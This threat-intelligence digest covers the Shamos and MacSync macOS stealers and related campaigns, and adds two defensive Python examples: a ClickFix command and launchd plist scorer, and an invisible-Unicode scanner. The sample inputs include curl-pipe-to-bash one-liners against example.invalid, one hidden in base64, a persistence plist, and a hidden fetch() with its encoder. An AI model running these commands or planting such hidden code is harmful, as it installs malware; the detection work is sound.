
Shamos Infostealer Targeting Mac Devices via ClickFix Attacks

3 unique sources, 4 articles

Summary


A new infostealer named Shamos is targeting Mac devices through ClickFix attacks. The malware, attributed to the COOKIE SPIDER group, steals data and credentials from web browsers, the Keychain, Apple Notes, and cryptocurrency wallets. The attacks use malvertising and fake GitHub repositories to lure victims into pasting a shell command into Terminal that downloads and installs the malware. Since June 2025, Shamos has attempted infections in more than three hundred environments monitored by CrowdStrike. The malware runs anti-VM checks, uses AppleScript for reconnaissance, and establishes persistence through a launchd Plist file. Users are advised not to execute commands they do not understand and to seek help from trusted sources.
A newer variant of the related MacSync stealer is delivered as a digitally signed and notarized Swift application masquerading as a messaging app installer. The disk image 'zk-call-messenger-installer-3.9.2-lts.dmg' is hosted at 'zkcall[.]net/download'. Because the app is signed and notarized it clears macOS Gatekeeper checks; the installer nonetheless shows instructions to right-click and open the app, a step that sidesteps Gatekeeper warnings. The DMG is unusually large at 25.5 MB, inflated with unrelated PDF documents as a decoy. The Swift dropper performs a series of checks, including an internet connectivity check, before downloading and executing a Base64-encoded script through a helper component. Its curl command deviates from earlier variants, using the flags -fL and -sS and the additional option --noproxy. The malware runs largely in memory and removes its temporary files after execution, leaving minimal traces. The developer certificate used to sign the application has since been revoked. The decoded payload is MacSync, a rebranded version of Mac.c that first emerged in April 2025; MacSync ships a fully featured Go-based agent for remote command and control.

Timeline

  1. 22.12.2025 22:43 · 3 articles

    New MacSync variant bypasses macOS Gatekeeper checks

    A new variant of the MacSync stealer, a rebranded version of Mac.c that first emerged in April 2025, is delivered as a digitally signed and notarized Swift application masquerading as a messaging app installer. The disk image 'zk-call-messenger-installer-3.9.2-lts.dmg' is hosted at 'zkcall[.]net/download'. Because the app is signed and notarized it clears macOS Gatekeeper checks; the installer nonetheless shows instructions to right-click and open the app, a step that sidesteps Gatekeeper warnings. The DMG is unusually large at 25.5 MB, inflated with unrelated PDF documents as a decoy. The Swift dropper performs a series of checks, including an internet connectivity check, before downloading and executing a Base64-encoded script through a helper component. Its curl command deviates from earlier variants, using the flags -fL and -sS and the additional option --noproxy. The decoded payload is MacSync itself, which ships a fully featured Go-based agent for remote command and control. The malware runs largely in memory and removes its temporary files after execution, leaving minimal traces. The developer certificate used to sign the application has since been revoked.

  2. 22.08.2025 18:44 · 2 articles

    Shamos infostealer targeting Mac devices via ClickFix attacks

    Since June 2025, the Shamos infostealer has attempted infections in more than three hundred environments monitored by CrowdStrike. The malware, attributed to the COOKIE SPIDER group, steals data and credentials from web browsers, the Keychain, Apple Notes, and cryptocurrency wallets. It is distributed through ClickFix attacks that use malvertising and fake GitHub repositories to get victims to paste a shell command into Terminal. The malware runs anti-VM checks, uses AppleScript for reconnaissance, and establishes persistence through a launchd Plist file. Users are advised not to execute commands they do not understand and to seek help from trusted sources.

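The detection logic below is an added example, not CrowdStrike's, the page's, or the malware authors' code. It scores macOS command lines (as captured in shell history or an EDR process log) and launchd plists for the indicators the two timeline entries describe: a downloader piped into a shell, a Base64 blob decoded and executed, inline osascript, staging under temp or hidden directories, and the -fL/-sS/--noproxy curl flag combination attributed to the newer MacSync variant. The regexes, path heuristics, sample command lines, the example.invalid URLs and the plist are all constructed for illustration.

```python
"""Added example (not CrowdStrike's, the page's, or the malware authors' code):
score macOS command lines and launchd plists for the ClickFix / MacSync
indicators described above. All sample inputs are constructed."""
from __future__ import annotations

import base64
import binascii
import plistlib
import re

# Regexes are ours. Only the flag names (-fL, -sS, --noproxy) come from the page;
# everything else is a generic heuristic for download-and-execute one-liners.
DOWNLOADER = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|k)?sh\b", re.I)
# `base64 -d` on current macOS; older builds used `base64 -D`, hence [dD].
B64_TO_SHELL = re.compile(r"base64\s+(-[dD]\b|--decode)[^|;&]*\|\s*(ba|z|k)?sh\b", re.I)
INLINE_B64 = re.compile(r"""\becho\s+["']?([A-Za-z0-9+/]{40,}={0,2})["']?\s*\|""")
MACSYNC_CURL = re.compile(r"\bcurl\b(?=.*\s-fL\b)(?=.*\s-sS\b)(?=.*\s--noproxy\b)")
OSASCRIPT = re.compile(r"\bosascript\b.*\s-e\s")
TEMP_OR_HIDDEN = re.compile(
    r"(?:^|[\s=])(?:/private)?/(?:tmp|var/tmp)/|/Users/[^/\s]+/\.[^/\s]+"
)


def score_command(cmd: str) -> list[str]:
    """Return the list of indicator names that fire on one command line."""
    hits: list[str] = []
    if DOWNLOADER.search(cmd):
        hits.append("downloader-piped-to-shell")
    if B64_TO_SHELL.search(cmd):
        hits.append("base64-decode-to-shell")
    if MACSYNC_CURL.search(cmd):
        hits.append("curl-fL-sS-noproxy")
    if OSASCRIPT.search(cmd):
        hits.append("osascript-inline")
    if TEMP_OR_HIDDEN.search(cmd):
        hits.append("temp-or-hidden-path")
    m = INLINE_B64.search(cmd)
    if m:
        hits.append("inline-base64-blob")
        # Decode the blob and score what it would have run, so a lure that
        # hides `curl ... | bash` behind base64 is still attributed correctly.
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            inner = ""
        hits.extend("decoded:" + h for h in score_command(inner))
    return hits


def inspect_launch_agent(plist_bytes: bytes) -> dict:
    """Parse a LaunchAgent/LaunchDaemon plist and score its command line.

    Persistence through a Plist file is what the page reports for Shamos; the
    label and path used there are not given, so nothing here is keyed to them.
    """
    d = plistlib.loads(plist_bytes)
    args = d.get("ProgramArguments") or ([d["Program"]] if "Program" in d else [])
    cmdline = " ".join(str(a) for a in args)
    hits = score_command(cmdline)
    if hits and d.get("RunAtLoad"):
        hits.append("run-at-load")
    return {"label": d.get("Label"), "cmdline": cmdline, "hits": hits}


# Constructed sample inputs (example.invalid is a reserved, non-routable name).
SAMPLE_COMMANDS = [
    # A ClickFix "fix" one-liner; the blob decodes to `curl -fsSL https://example.invalid/i | bash`.
    'echo "Y3VybCAtZnNTTCBodHRwczovL2V4YW1wbGUuaW52YWxpZC9pIHwgYmFzaA==" | base64 -d | bash',
    # The flag combination the page attributes to the newer MacSync curl command.
    'curl -fL -sS --noproxy "*" https://example.invalid/payload -o /tmp/.p && sh /tmp/.p',
    # Inline AppleScript reconnaissance.
    "osascript -e 'system info'",
    # Benign activity that must not fire.
    "brew update && brew upgrade",
    "git clone https://github.com/example/repo.git",
]

SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>/Users/victim/.cache/.upd; curl -fsSL https://example.invalid/p | bash</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(f"{score_command(cmd) or ['clean']!s:<70} {cmd}")
    print(inspect_launch_agent(SAMPLE_PLIST))
```

To use it on a live host, feed `score_command` each line of `~/.zsh_history` or each process command line from your EDR export, and feed `inspect_launch_agent` the bytes of every file under `~/Library/LaunchAgents`, `/Library/LaunchAgents` and `/Library/LaunchDaemons`. The path heuristic will also flag legitimate tools that stage under `/tmp`, so treat it as a triage score, not a verdict.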


Similar Happenings

Lazarus Group Expands BeaverTail Malware Capabilities

A new variant of the BeaverTail malware has been linked to the Lazarus Group, targeting cryptocurrency traders, developers, and retail employees. The malware, which functions as both an information stealer and a loader, has evolved to include advanced obfuscation techniques and diverse delivery methods. It has been observed using layered Base64 and XOR encoding to conceal its behavior and has been distributed through trojanized npm packages, fake job interview platforms, and ClickFix lures. The malware's capabilities now include keylogging, screenshot capture, and clipboard monitoring, aimed at stealing cryptocurrency wallet data and credentials. Additionally, BeaverTail has been merged with another DPRK-linked strain known as OtterCookie, enhancing its browser profile enumeration and remote access capabilities.

GlassWorm malware targets OpenVSX, VS Code registries

The GlassWorm malware campaign has resurfaced with a third wave, adding 24 new packages to OpenVSX and the Microsoft Visual Studio Marketplace. The malware hides its malicious code behind invisible Unicode characters and targets GitHub, NPM, and OpenVSX account credentials as well as cryptocurrency wallet data. The campaign initially impacted 49 extensions with an estimated 35,800 downloads, a figure inflated by bots and visibility-boosting tactics. The Eclipse Foundation revoked leaked tokens and introduced security measures, but the threat actors pivoted to GitHub and have now returned to OpenVSX with updated command-and-control endpoints, posting a fresh transaction to the Solana blockchain that provides the C2 endpoint for the next-stage payload. The attackers' server was inadvertently exposed; Koi Security accessed it, recovered a partial victim list spanning the United States, South America, Europe, and Asia, including a major government entity in the Middle East, and shared the data with law enforcement. The threat actor is assessed to be Russian-speaking and uses the open-source browser-extension C2 framework RedExt as part of its infrastructure. The third wave packages Rust-based implants inside the extensions and targets popular developer tools and frameworks such as Flutter, Vim, YAML, Tailwind, Svelte, React Native, and Vue. Separately, a malicious Rust crate named "evm-units", uploaded to crates.io in mid-April 2025 and downloaded more than 7,000 times, targets Windows, macOS, and Linux developer machines by masquerading as an Ethereum Virtual Machine (EVM) unit helper tool.
The crate checks for the presence of Qihoo 360 antivirus and alters its execution flow accordingly; its references to EVM and Uniswap indicate that the supply chain attack is aimed at developers in the Web3 space.
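The scanner below is an added example, not Koi Security's or the page's code. It walks source text for runs of invisible Unicode of the kind GlassWorm hid code behind, reports each run with its line and column, and, where a run consists entirely of Unicode variation selectors, recovers the bytes it carries. The page does not state which code points the campaign used; the byte-to-variation-selector scheme, the character classes treated as invisible, and the sample extension text are all assumptions made for the example.

```python
"""Added example (not Koi Security's or the page's code): find runs of invisible
Unicode in source text and recover bytes smuggled with a variation-selector
scheme. The scheme and the sample file are assumptions, not campaign details."""
from __future__ import annotations

import unicodedata


def is_invisible(ch: str) -> bool:
    """True for characters that render as nothing in a normal editor view."""
    cp = ord(ch)
    # Variation selectors are category Mn, so they need an explicit range.
    if 0xFE00 <= cp <= 0xFE0F or 0xE0100 <= cp <= 0xE01EF:
        return True
    # Cf: zero-width, bidi and tag controls; Co: private use; Cn: unassigned.
    # Cf also covers U+00AD (soft hyphen), so expect some noise in prose files.
    return unicodedata.category(ch) in ("Cf", "Co", "Cn")


def encode_vs(data: bytes) -> str:
    """Assumed smuggling scheme: byte 0..15 -> U+FE00.., byte 16..255 -> U+E0100.."""
    return "".join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16) for b in data)


def decode_vs(run: str) -> bytes:
    """Inverse of encode_vs; characters outside the two ranges are skipped."""
    out = bytearray()
    for ch in run:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            out.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            out.append(cp - 0xE0100 + 16)
    return bytes(out)


def scan_source(text: str) -> list[dict]:
    """Report every run of invisible characters with 1-based line/column and,
    when the whole run is variation selectors, the bytes it smuggles."""
    findings: list[dict] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        col = 0
        while col < len(line):
            if not is_invisible(line[col]):
                col += 1
                continue
            start = col
            while col < len(line) and is_invisible(line[col]):
                col += 1
            run = line[start:col]
            payload = decode_vs(run)
            findings.append({
                "line": lineno,
                "col": start + 1,
                "length": len(run),
                # Only claim a decoded payload if every character was a selector.
                "decoded": payload.decode("utf-8", "replace") if len(payload) == len(run) else None,
            })
    return findings


# Constructed sample: a benign-looking extension file with a fetch() call smuggled
# inside a string literal. The URL uses the reserved name example.invalid.
HIDDEN = encode_vs(b"fetch('https://example.invalid/stage2')")
SAMPLE_JS = "\n".join([
    "// constructed sample entry point, not code from the GlassWorm campaign",
    'const banner = "ready' + HIDDEN + '";',
    "function activate(ctx) { return banner.length > 5; }",
])

if __name__ == "__main__":
    for f in scan_source(SAMPLE_JS):
        print(f"line {f['line']} col {f['col']}: {f['length']} invisible chars -> {f['decoded']!r}")
```

Run `scan_source` over every `.js`, `.ts` and `package.json` file in an unpacked `.vsix` before installing it; a finding with `decoded` set is strong evidence of smuggled content, while a finding without it still deserves a look at what the editor is not showing you.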

TikTok Videos Distribute Infostealers via ClickFix Attacks

Cybercriminals are using TikTok videos to distribute information-stealing malware through ClickFix attacks. The videos, disguised as activation guides for popular software like Windows, Spotify, and Netflix, trick users into executing malicious PowerShell commands. These commands download and execute Aura Stealer malware, which steals credentials, cookies, and cryptocurrency wallets. The campaign has been ongoing and is similar to one observed by Trend Micro in May 2025.

TA585 Using MonsterV2 in Phishing Campaigns

TA585, a sophisticated threat actor, has been actively delivering the MonsterV2 malware via phishing campaigns since February 2025. The group manages its own infrastructure and employs multiple delivery techniques, including IRS and SBA-themed lures, malicious JavaScript injections, and fake CAPTCHA verifications. MonsterV2, also known as Aurotun Stealer, is a versatile malware capable of stealing sensitive data, acting as a clipper, establishing remote control, and executing commands from a C2 server. The malware is sold by a Russian-speaking actor and is typically packed using a C++ crypter called SonicCrypt to evade detection. TA585's campaigns have also included GitHub-themed lures and the distribution of other malware, such as Rhadamanthys. MonsterV2 avoids infecting systems in Commonwealth of Independent States (CIS) countries.

Apple increases bug bounty payouts for zero-click RCE vulnerabilities

Apple has expanded and redesigned its bug bounty program, doubling maximum payouts and adding new research categories. The highest reward is now $2 million for zero-click remote code execution (RCE) vulnerabilities, with a bonus system that can exceed $5 million. The program now includes higher payouts for various types of vulnerabilities, including one-click remote attacks, wireless proximity attacks, and unauthorized iCloud access. Apple also plans to distribute secured iPhone 17 devices to civil society organizations and researchers in 2026. The changes aim to incentivize the discovery and reporting of sophisticated security issues, particularly those exploited by mercenary spyware. The program has awarded $35 million to 800 security researchers since its inception in 2020. The expansion includes a $100,000 reward for a complete Gatekeeper bypass and a $1 million reward for broad unauthorized iCloud access. Apple's latest bug bounty announcement is a response to the growth of commercial spyware activity, with the UK’s National Cyber Security Centre (NCSC) estimating that the commercial cyber intrusion sector doubles every 10 years.